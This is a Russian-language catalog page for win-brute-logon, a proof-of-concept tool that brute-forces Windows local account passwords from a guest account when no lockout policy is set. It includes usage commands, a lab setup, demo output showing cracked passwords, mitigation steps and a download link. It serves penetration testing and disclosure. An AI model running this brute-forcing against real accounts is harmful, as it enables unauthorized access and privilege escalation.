Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
win-brute-logon — Взломать пароль любого пользователя Microsoft Windows без каких-либо привилегий (включая гостевую учётную запись) | Kitploit
Инструменты/GitHubGitHub/darkcodersc/win-brute-logon
Взлом паролейПовышение привилегийАтаки на ПаролиЭксплуатацияТестирование на Проникновение
GitHubdarkcodersc/win-brute-logon

win-brute-logon

Взломать пароль любого пользователя Microsoft Windows без каких-либо привилегий (включая гостевую учётную запись)

Репозиторий
1.2k187132 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уведомление 1: Мы рады сообщить, что наш текущий инструмент был портирован в версию PowerShell. Это означает, что теперь пользователи могут получить доступ к инструменту и использовать его напрямую из командной строки PowerShell, что делает его ещё более удобным и эффективным. Мы считаем, что эта новая версия принесёт большую пользу нашим пользователям и улучшит их опыт работы с инструментом. Спасибо за вашу постоянную поддержку, и мы надеемся, что вам понравится новая версия PowerShell: https://github.com/DarkCoderSc/power-brute-logon

Уведомление 2: Недавно мы узнали, что Microsoft включила политику блокировки учётной записи по умолчанию в современных и обновлённых версиях Windows. Эта политика помогает защитить систему, блокируя учётную запись после определённого количества неудачных попыток входа. Хотя это полезная мера безопасности, она делает доказательство концепции (PoC) неэффективным на этих системах.

Win Brute Logon (Proof Of Concept)

Дата выхода: 2020-05-14

Цель: Windows XP – последняя версия Windows 10 (1909)

Console

Место уязвимости: LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW

Использование

Файл со списком паролей

WinBruteLogon.exe -u <имя_пользователя> -w <файл_со_списком>

Список паролей через stdin

type <файл_со_списком> | WinBruteLogon.exe -u <имя_пользователя> -

Введение

Win Brute Logon предназначен для имитации атаки методом перебора (brute-force) на учётную запись Microsoft, угадывая большое количество комбинаций паролей за короткое время. Это позволяет пентестерам проверить безопасность своих систем и оценить их защищённость от атак перебором. Инструмент использует отсутствие механизма блокировки учётной записи (который до Windows 11 не был включён по умолчанию). Пытаясь угадать пароль учётной записи, инструмент помогает пентестерам выявить и устранить уязвимости в мерах безопасности. Его следует использовать ответственно и в рамках закона.

Сценарий тестирования PoC (с гостевой учётной записью)

Для этой демонстрации мы настроим свежую версию Windows 10 на виртуальной или физической машине. После установки войдите в систему как администратор. Затем создайте две разные локальные учётные записи: одну администраторскую и одну обычного пользователя. Обратите внимание: хотя в демонстрации мы будем использовать гостевую учётную запись, эта доказательство концепции (PoC) не ограничивается ею. Его можно использовать из любой учётной записи или группы, включая гостевую, обычного пользователя и администратора.

Создание нового пользователя-администратора

net user darkcodersc /add

net user darkcodersc trousers (trousers — пароль)

net localgroup administrators darkcodersc /add

Создание обычного пользователя

net user HackMe /add

net user HackMe ozlq6qwm (ozlq6qwm — пароль)

Создание новой гостевой учётной записи

net user GuestUser /add

net localgroup users GuestUser /delete

net localgroup guests GuestUser /add

Получение списка паролей

В моём случае оба пароля (trousers и ozlq6qwm) есть в SecList: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

Запуск атаки

Для начала демонстрации выйдите из учётной записи администратора или перезагрузите машину и войдите в гостевую учётную запись. Затем поместите исполняемый файл PoC в место, доступное гостевому пользователю.

Использование: WinBruteLogon.exe -v -u <имя_пользователя> -w <файл_со_списком>

Опция -v является необязательной и включает подробный режим.

По умолчанию доменное имя берётся из переменной среды %USERDOMAIN%. Вы можете указать своё имя с помощью опции -d.

Взлом первого пользователя: darkcodersc (Администратор)

prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

Подождите несколько секунд, чтобы увидеть результат:

[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

Взлом второго пользователя: HackMe (Обычный пользователь)

prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

Подождите несколько секунд, чтобы увидеть результат:

[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

Реальный сценарий

«В реальном сценарии, если злоумышленник получает доступ к учётной записи с низкими привилегиями, он может взломать пароль более привилегированного пользователя и повысить свои привилегии. Чтобы снизить этот риск, можно предпринять несколько шагов:

  • Если есть гостевая учётная запись, отключите её.
  • Внедрите белую листинг приложений, чтобы ограничить выполнение неавторизованного ПО.
  • Следуйте рекомендациям по созданию и поддержанию надёжных паролей для всех пользователей.

Чтобы включить политику блокировки учётной записи (которая не включена по умолчанию), выполните следующие действия:

  • Откройте утилиту «secpol.msc».
  • Перейдите в «Политики учетных записей» > «Политика блокировки учетной записи».
  • Измените значение «Порог блокировки учетной записи» на желаемое количество попыток (от 1 до 999). Это значение представляет собой количество неудачных попыток входа до блокировки учётной записи.

Обратите внимание, что политика блокировки не применяется к учётной записи администратора. В этом случае лучшая защита для учётной записи администратора (если она включена) — установка очень сложного пароля.

Отчёт об этой уязвимости был отправлен команде безопасности Microsoft. Им следует рассмотреть возможность включения политики блокировки учётной записи по умолчанию.»

(ОБНОВЛЕНИЕ 2022): Блокировка учётной записи наконец-то включена по умолчанию.

Скачать инструмент